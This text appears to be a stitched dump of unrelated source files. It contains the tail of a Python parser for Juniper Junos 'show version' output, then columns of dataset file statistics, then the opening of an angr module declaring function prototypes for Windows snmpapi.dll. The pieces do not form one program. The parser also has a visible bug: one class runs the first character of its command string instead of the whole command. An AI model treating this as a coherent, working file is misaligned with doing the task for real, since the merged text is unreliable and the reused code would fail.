"JUNOS libs [20190621.152752_builder_junos_192_r1]":"junos-libs",
"JUNOS OS libs compat32 [20190517.f0321c3_builder_stable_11]":"os-libs-compat32",
"JUNOS OS 32-bit compatibility [20190517.f0321c3_builder_stable_11]":"os-compat32",
"JUNOS libs compat32 [20190621.152752_builder_junos_192_r1]":"junos-libs-compat32",
"JUNOS runtime [20190621.152752_builder_junos_192_r1]":"junos-runtime",
"JUNOS Packet Forwarding Engine Simulation Package [20190621.152752_builder_junos_192_r1]":"vmguest",
"JUNOS sflow mx [20190621.152752_builder_junos_192_r1]":"sflow-platform",
"JUNOS py extensions [20190621.152752_builder_junos_192_r1]":"py-extensions",
"JUNOS py base [20190621.152752_builder_junos_192_r1]":"py-base",
"JUNOS OS vmguest [20190517.f0321c3_builder_stable_11]":"os-vmguest",
"JUNOS OS crypto [20190517.f0321c3_builder_stable_11]":"os-crypto",
"JUNOS na telemetry [19.2R1.8]":"na-telemetry",
"JUNOS mx libs compat32 [20190621.152752_builder_junos_192_r1]":"junos-libs-compat32-platform",
"JUNOS mx runtime [20190621.152752_builder_junos_192_r1]":"junos-runtime-platform",
"JUNOS common platform support [20190621.152752_builder_junos_192_r1]":"junos-platform",
"JUNOS Openconfig [19.2R1.8]":"junos-openconfig",
"JUNOS mtx network modules [20190621.152752_builder_junos_192_r1]":"junos-net-platform",
"JUNOS modules [20190621.152752_builder_junos_192_r1]":"junos-modules",
"JUNOS mx modules [20190621.152752_builder_junos_192_r1]":"junos-modules-platform",
"JUNOS mx libs [20190621.152752_builder_junos_192_r1]":"junos-libs-platform",
"JUNOS SQL Sync Daemon [20190621.152752_builder_junos_192_r1]":"junos-jsqlsync",
"JUNOS mtx Data Plane Crypto Support [20190621.152752_builder_junos_192_r1]":"junos-dp-crypto-support-platform",
"JUNOS daemons [20190621.152752_builder_junos_192_r1]":"junos-daemons",
"JUNOS mx daemons [20190621.152752_builder_junos_192_r1]":"junos-daemons-platform",
"JUNOS -MX appidd application-identification daemon [20190621.152752_builder_junos_192_r1]":"junos-appidd",
"JUNOS Simulation Linux Package [20190621.152752_builder_junos_192_r1]":"jsim-wrlinux",
"JUNOS Simulation Package [20190621.152752_builder_junos_192_r1]":"jsim-pfe-vmx",
"JUNOS Services URL Filter package [20190621.152752_builder_junos_192_r1]":"jservices-urlf",
"JUNOS Services TLB Service PIC package [20190621.152752_builder_junos_192_r1]":"jservices-traffic-dird",
"JUNOS Services Telemetry [20190621.152752_builder_junos_192_r1]":"jservices-telemetry",
"JUNOS Services TCP-LOG [20190621.152752_builder_junos_192_r1]":"jservices-tcp-log",
"JUNOS Services SSL [20190621.152752_builder_junos_192_r1]":"jservices-ssl",
"JUNOS Services SOFTWIRE [20190621.152752_builder_junos_192_r1]":"jservices-softwire",
"JUNOS Services Stateful Firewall [20190621.152752_builder_junos_192_r1]":"jservices-sfw",
"JUNOS Services RTCOM [20190621.152752_builder_junos_192_r1]":"jservices-rtcom",
"JUNOS Services RPM [20190621.152752_builder_junos_192_r1]":"jservices-rpm",
"JUNOS Services PCEF package [20190621.152752_builder_junos_192_r1]":"jservices-pcef",
"JUNOS Services NAT [20190621.152752_builder_junos_192_r1]":"jservices-nat",
"JUNOS Services Mobile Subscriber Service Container package [20190621.152752_builder_junos_192_r1]":"jservices-mss",
"JUNOS Services MobileNext Software package [20190621.152752_builder_junos_192_r1]":"jservices-mobile",
"JUNOS Services Logging Report Framework package [20190621.152752_builder_junos_192_r1]":"jservices-lrf",
"JUNOS Services LL-PDF Container package [20190621.152752_builder_junos_192_r1]":"jservices-llpdf",
"JUNOS Services Jflow Container package [20190621.152752_builder_junos_192_r1]":"jservices-jflow",
"JUNOS Services Deep Packet Inspection package [20190621.152752_builder_junos_192_r1]":"jservices-jdpi",
"JUNOS Services IPSec [20190621.152752_builder_junos_192_r1]":"jservices-ipsec",
"JUNOS Services IDS [20190621.152752_builder_junos_192_r1]":"jservices-ids",
"JUNOS IDP Services [20190621.152752_builder_junos_192_r1]":"jservices-idp",
"JUNOS Services HTTP Content Management package [20190621.152752_builder_junos_192_r1]":"jservices-hcm",
"JUNOS Services Flowd MS-MPC Software package [20190621.152752_builder_junos_192_r1]":"jservices-fwdd",
"JUNOS Services Crypto [20190621.152752_builder_junos_192_r1]":"jservices-crypto-base",
"JUNOS Services Captive Portal and Content Delivery Container package [20190621.152752_builder_junos_192_r1]":"jservices-cpcd",
"JUNOS Services COS [20190621.152752_builder_junos_192_r1]":"jservices-cos",
"JUNOS AppId Services [20190621.152752_builder_junos_192_r1]":"jservices-appid",
"JUNOS Services Application Level Gateways [20190621.152752_builder_junos_192_r1]":"jservices-alg",
"JUNOS Services AACL Container package [20190621.152752_builder_junos_192_r1]":"jservices-aacl",
"JUNOS Extension Toolkit [20190621.152752_builder_junos_192_r1]":"jsd-jet-1",
"JUNOS Juniper Malware Removal Tool (JMRT) [1.0.0+20190621.152752_builder_junos_192_r1]":"jmrt-base-x86-64",
"JUNOS J-Insight [20190621.152752_builder_junos_192_r1]":"jinsight",
"JUNOS Online Documentation [20190621.152752_builder_junos_192_r1]":"jdocs",
"JUNOS jail runtime [20190517.f0321c3_builder_stable_11]":"jail-runtime",
"KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built":"KERNEL"
}
for line in out.splitlines():
line = line.strip()
# Hostname: sr_hktGDS201
m = p1.match(line)
if m:
software_info_first_entry = ret_dict.setdefault("software-information", {})
group = m.groupdict()
package_list = []
version_info_list = []
software_info_first_entry['host-name'] = group['host_name']
continue
# Model: vmx
m = p2.match(line)
if m:
group = m.groupdict()
software_info_first_entry['product-model'] = group['product_model']
software_info_first_entry['product-name'] = group['product_model']
continue
# Junos: 19.2R1.8
m = p3.match(line)
if m:
group = m.groupdict()
software_info_first_entry['junos-version'] = group['junos_version']
continue
# JLAUNCHD release 19.2R1.8 built by builder on 2019-06-21 17:47:00 UTC
m = p4.match(line)
if m:
group = m.groupdict()
output_list = []
output_list.append(group['output'])
continue
# smartd 6.4 2015-06-04 r4109 [FreeBSD JNPR-11.0-20190517.f0321c3_buil amd64] Junos Build
m = p5.match(line)
if m:
group = m.groupdict()
output_list.append(group['output'])
continue
# Copyright (C) 2002-15, Bruce Allen, Christian Franke, www.smartmontools.org
m = p6.match(line)
if m:
group = m.groupdict()
output_list.append(group['output'])
software_info_first_entry["output"] = output_list
continue
#JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]
m = p7.match(line)
if m:
group = m.groupdict()
entry_dict = {}
entry_dict["comment"] = group["comment"]
entry_dict["name"] = package_map[group["comment"]]
package_list.append(entry_dict)
continue
#KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built
m = p8.match(line)
if m:
group = m.groupdict()
entry_dict = {}
entry_dict["comment"] = group["comment"]
entry_dict["name"] = package_map[group["comment"]]
package_list.append(entry_dict)
software_info_first_entry["package-information"] = package_list
continue
#MGD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:49 UTC
#COMMIT-SYNCD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:46 UTC
m = p9.match(line)
if m:
group = m.groupdict()
entry_dict = {}
entry_dict["build-date"] = group["build_date"]
entry_dict["builder"] = group["builder"]
entry_dict["component"] = group["component"]
entry_dict["release"] = group["release"]
version_info_list.append(entry_dict)
if(group["component"].strip() == "vlans-ng-actions-dd"):
software_info_first_entry["version-information"] = version_info_list
continue
return ret_dict
class ShowVersionDetailNoForwarding(ShowVersionDetail):
""" Parser for:
- show version detail no-forwarding
"""
cli_command = 'show version detail no-forwarding'
def cli(self, output=None):
if not output:
out = self.device.execute(self.cli_command[0])
else:
out = output
return super().cli(output=out)
class ShowVersionInvokeOnAllRoutingEnginesSchema(MetaParser):
""" schema = {
Optional("@xmlns:junos"): str,
"multi-routing-engine-results": {
"multi-routing-engine-item": {
"re-name": str,
"software-information": {
"host-name": str,
"junos-version": str,
"package-information": [
{
"comment": str,
"name": str
}
],
"product-model": str,
"product-name": str
}
}
}
} """
# Main Schema
schema = {
Optional("@xmlns:junos"): str,
"multi-routing-engine-results": {
"multi-routing-engine-item": {
"re-name": str,
"software-information": {
"host-name": str,
"junos-version": str,
"package-information": ListOf({
"comment": str,
"name": str
}),
"product-model": str,
Optional("product-name"): str
}
}
}
}
class ShowVersionInvokeOnAllRoutingEngines(ShowVersionInvokeOnAllRoutingEnginesSchema):
""" Parser for:
* show version invoke-on all-routing-engines
"""
cli_command = 'show version invoke-on all-routing-engines'
def cli(self, output=None):
if not output:
out = self.device.execute(self.cli_command)
else:
out = output
ret_dict = {}
#re0:
p0 = re.compile(r'^(?P<re_name>\Are0+)+:$')
#Hostname: sr_hktGDS201
p1 = re.compile(r'^Hostname: +(?P<host_name>\S+)$')
#Model: vmx
p2 = re.compile(r'^Model: +(?P<product_model>\S+)$')
#Junos: 19.2R1.8
p3 = re.compile(r'^Junos: +(?P<junos_version>\S+)$')
#JLAUNCHD release 19.2R1.8 built by builder on 2019-06-21 17:47:00 UTC
p4 = re.compile(r'^(?P<output>\AJLAUNCHD+[\S\s]+)$')
#smartd 6.4 2015-06-04 r4109 [FreeBSD JNPR-11.0-20190517.f0321c3_buil amd64] Junos Build
p5 = re.compile(r'^(?P<output>\Asmartd+[\S\s]+)$')
#Copyright (C) 2002-15, Bruce Allen, Christian Franke, www.smartmontools.org
p6 = re.compile(r'^(?P<output>\ACopyright+[\S\s]+)$')
#JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]
p7 = re.compile(r'^(?P<comment>JUNOS[\S\s]+)$')
#KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built
p8 = re.compile(r'^(?P<comment>KERNEL[\S\s]+)$')
#MGD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:49 UTC
#COMMIT-SYNCD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:46 UTC
p9 = re.compile(r'^(?P<component>[\w\s\-]+)release +(?P<release>\S+) +built +by +(?P<builder>\S+) +on +(?P<build_date>[\S\s]+)$')
package_map = {"JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]":"os-kernel",
"JUNOS OS libs [20190517.f0321c3_builder_stable_11]":"os-libs",
"JUNOS OS runtime [20190517.f0321c3_builder_stable_11]":"os-runtime",
"JUNOS OS time zone information [20190517.f0321c3_builder_stable_11]":"zoneinfo",
"JUNOS network stack and utilities [20190621.152752_builder_junos_192_r1]":"netstack",
"JUNOS libs [20190621.152752_builder_junos_192_r1]":"junos-libs",
"JUNOS OS libs compat32 [20190517.f0321c3_builder_stable_11]":"os-libs-compat32",
"JUNOS OS 32-bit compatibility [20190517.f0321c3_builder_stable_11]":"os-compat32",
"JUNOS libs compat32 [20190621.152752_builder_junos_192_r1]":"junos-libs-compat32",
"JUNOS runtime [20190621.152752_builder_junos_192_r1]":"junos-runtime",
"JUNOS Packet Forwarding Engine Simulation Package [20190621.152752_builder_junos_192_r1]":"vmguest",
"JUNOS sflow mx [20190621.152752_builder_junos_192_r1]":"sflow-platform",
"JUNOS py extensions [20190621.152752_builder_junos_192_r1]":"py-extensions",
"JUNOS py base [20190621.152752_builder_junos_192_r1]":"py-base",
"JUNOS OS vmguest [20190517.f0321c3_builder_stable_11]":"os-vmguest",
"JUNOS OS crypto [20190517.f0321c3_builder_stable_11]":"os-crypto",
"JUNOS na telemetry [19.2R1.8]":"na-telemetry",
"JUNOS mx libs compat32 [20190621.152752_builder_junos_192_r1]":"junos-libs-compat32-platform",
"JUNOS mx runtime [20190621.152752_builder_junos_192_r1]":"junos-runtime-platform",
"JUNOS common platform support [20190621.152752_builder_junos_192_r1]":"junos-platform",
"JUNOS Openconfig [19.2R1.8]":"junos-openconfig",
"JUNOS mtx network modules [20190621.152752_builder_junos_192_r1]":"junos-net-platform",
"JUNOS modules [20190621.152752_builder_junos_192_r1]":"junos-modules",
"JUNOS mx modules [20190621.152752_builder_junos_192_r1]":"junos-modules-platform",
"JUNOS mx libs [20190621.152752_builder_junos_192_r1]":"junos-libs-platform",
"JUNOS SQL Sync Daemon [20190621.152752_builder_junos_192_r1]":"junos-jsqlsync",
"JUNOS mtx Data Plane Crypto Support [20190621.152752_builder_junos_192_r1]":"junos-dp-crypto-support-platform",
"JUNOS daemons [20190621.152752_builder_junos_192_r1]":"junos-daemons",
"JUNOS mx daemons [20190621.152752_builder_junos_192_r1]":"junos-daemons-platform",
"JUNOS -MX appidd application-identification daemon [20190621.152752_builder_junos_192_r1]":"junos-appidd",
"JUNOS Simulation Linux Package [20190621.152752_builder_junos_192_r1]":"jsim-wrlinux",
"JUNOS Simulation Package [20190621.152752_builder_junos_192_r1]":"jsim-pfe-vmx",
"JUNOS Services URL Filter package [20190621.152752_builder_junos_192_r1]":"jservices-urlf",
"JUNOS Services TLB Service PIC package [20190621.152752_builder_junos_192_r1]":"jservices-traffic-dird",
"JUNOS Services Telemetry [20190621.152752_builder_junos_192_r1]":"jservices-telemetry",
"JUNOS Services TCP-LOG [20190621.152752_builder_junos_192_r1]":"jservices-tcp-log",
"JUNOS Services SSL [20190621.152752_builder_junos_192_r1]":"jservices-ssl",
"JUNOS Services SOFTWIRE [20190621.152752_builder_junos_192_r1]":"jservices-softwire",
"JUNOS Services Stateful Firewall [20190621.152752_builder_junos_192_r1]":"jservices-sfw",
"JUNOS Services RTCOM [20190621.152752_builder_junos_192_r1]":"jservices-rtcom",
"JUNOS Services RPM [20190621.152752_builder_junos_192_r1]":"jservices-rpm",
"JUNOS Services PCEF package [20190621.152752_builder_junos_192_r1]":"jservices-pcef",
"JUNOS Services NAT [20190621.152752_builder_junos_192_r1]":"jservices-nat",
"JUNOS Services Mobile Subscriber Service Container package [20190621.152752_builder_junos_192_r1]":"jservices-mss",
"JUNOS Services MobileNext Software package [20190621.152752_builder_junos_192_r1]":"jservices-mobile",
"JUNOS Services Logging Report Framework package [20190621.152752_builder_junos_192_r1]":"jservices-lrf",
"JUNOS Services LL-PDF Container package [20190621.152752_builder_junos_192_r1]":"jservices-llpdf",
"JUNOS Services Jflow Container package [20190621.152752_builder_junos_192_r1]":"jservices-jflow",
"JUNOS Services Deep Packet Inspection package [20190621.152752_builder_junos_192_r1]":"jservices-jdpi",
"JUNOS Services IPSec [20190621.152752_builder_junos_192_r1]":"jservices-ipsec",
"JUNOS Services IDS [20190621.152752_builder_junos_192_r1]":"jservices-ids",
"JUNOS IDP Services [20190621.152752_builder_junos_192_r1]":"jservices-idp",
"JUNOS Services HTTP Content Management package [20190621.152752_builder_junos_192_r1]":"jservices-hcm",
"JUNOS Services Flowd MS-MPC Software package [20190621.152752_builder_junos_192_r1]":"jservices-fwdd",
"JUNOS Services Crypto [20190621.152752_builder_junos_192_r1]":"jservices-crypto-base",
"JUNOS Services Captive Portal and Content Delivery Container package [20190621.152752_builder_junos_192_r1]":"jservices-cpcd",
"JUNOS Services COS [20190621.152752_builder_junos_192_r1]":"jservices-cos",
"JUNOS AppId Services [20190621.152752_builder_junos_192_r1]":"jservices-appid",
"JUNOS Services Application Level Gateways [20190621.152752_builder_junos_192_r1]":"jservices-alg",
"JUNOS Services AACL Container package [20190621.152752_builder_junos_192_r1]":"jservices-aacl",
"JUNOS Extension Toolkit [20190621.152752_builder_junos_192_r1]":"jsd-jet-1",
"JUNOS Juniper Malware Removal Tool (JMRT) [1.0.0+20190621.152752_builder_junos_192_r1]":"jmrt-base-x86-64",
"JUNOS J-Insight [20190621.152752_builder_junos_192_r1]":"jinsight",
"JUNOS Online Documentation [20190621.152752_builder_junos_192_r1]":"jdocs",
"JUNOS jail runtime [20190517.f0321c3_builder_stable_11]":"jail-runtime",
"KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built":"KERNEL"
}
for line in out.splitlines():
line = line.strip()
#re0:
m = p0.match(line)
if m:
group = m.groupdict()
multi_routing_engine_item_entry = ret_dict.setdefault("multi-routing-engine-results", {}).\
setdefault("multi-routing-engine-item", {})
software_information_entry = multi_routing_engine_item_entry.setdefault("software-information", {})
multi_routing_engine_item_entry['re-name'] = group['re_name']
continue
# Hostname: sr_hktGDS201
m = p1.match(line)
if m:
group = m.groupdict()
package_list = []
software_information_entry['host-name'] = group['host_name']
continue
# Model: vmx
m = p2.match(line)
if m:
group = m.groupdict()
software_information_entry['product-model'] = group['product_model']
software_information_entry['product-name'] = group['product_model']
continue
# Junos: 19.2R1.8
m = p3.match(line)
if m:
group = m.groupdict()
software_information_entry['junos-version'] = group['junos_version']
continue
#JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]
m = p7.match(line)
if m:
group = m.groupdict()
entry_dict = {}
entry_dict["comment"] = group["comment"]
entry_dict["name"] = package_map[group["comment"]]
package_list.append(entry_dict)
if(group["comment"].strip() == "JUNOS jail runtime [20190517.f0321c3_builder_stable_11]"):
software_information_entry["package-information"] = package_list
continue
return ret_dict
| 54.559921
| 155
| 0.574196
| 2,955
| 27,771
| 5.176311
| 0.10423
| 0.098849
| 0.148274
| 0.183577
| 0.913768
| 0.890233
| 0.878465
| 0.854799
| 0.850288
| 0.83597
| 0
| 0.156897
| 0.316301
| 27,771
| 509
| 156
| 54.559921
| 0.648707
| 0.130892
| 0
| 0.77381
| 0
| 0.005952
| 0.507659
| 0.248377
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008929
| false
| 0
| 0.011905
| 0
| 0.059524
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d3cab9d5570af4237c19902d71ef19df9fe407d2
| 29,411
|
py
|
Python
|
angr/procedures/definitions/win32_snmpapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_snmpapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_snmpapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("snmpapi.dll")
prototypes = \
{
#
'SnmpUtilOidCpy': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOidDst", "pOidSrc"]),
#
'SnmpUtilOidAppend': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOidDst", "pOidSrc"]),
#
'SnmpUtilOidNCmp': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pOid1", "pOid2", "nSubIds"]),
#
'SnmpUtilOidCmp': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOid1", "pOid2"]),
#
'SnmpUtilOidFree': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pOid"]),
#
'SnmpUtilOctetsCmp': SimTypeFunction([SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOctets1", "pOctets2"]),
#
'SnmpUtilOctetsNCmp': SimTypeFunction([SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pOctets1", "pOctets2", "nChars"]),
#
'SnmpUtilOctetsCpy': SimTypeFunction([SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOctetsDst", "pOctetsSrc"]),
#
'SnmpUtilOctetsFree': SimTypeFunction([SimTypePointer(SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pOctets"]),
#
'SnmpUtilAsnAnyCpy': SimTypeFunction([SimTypePointer(SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAnyDst", "pAnySrc"]),
#
'SnmpUtilAsnAnyFree': SimTypeFunction([SimTypePointer(SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pAny"]),
#
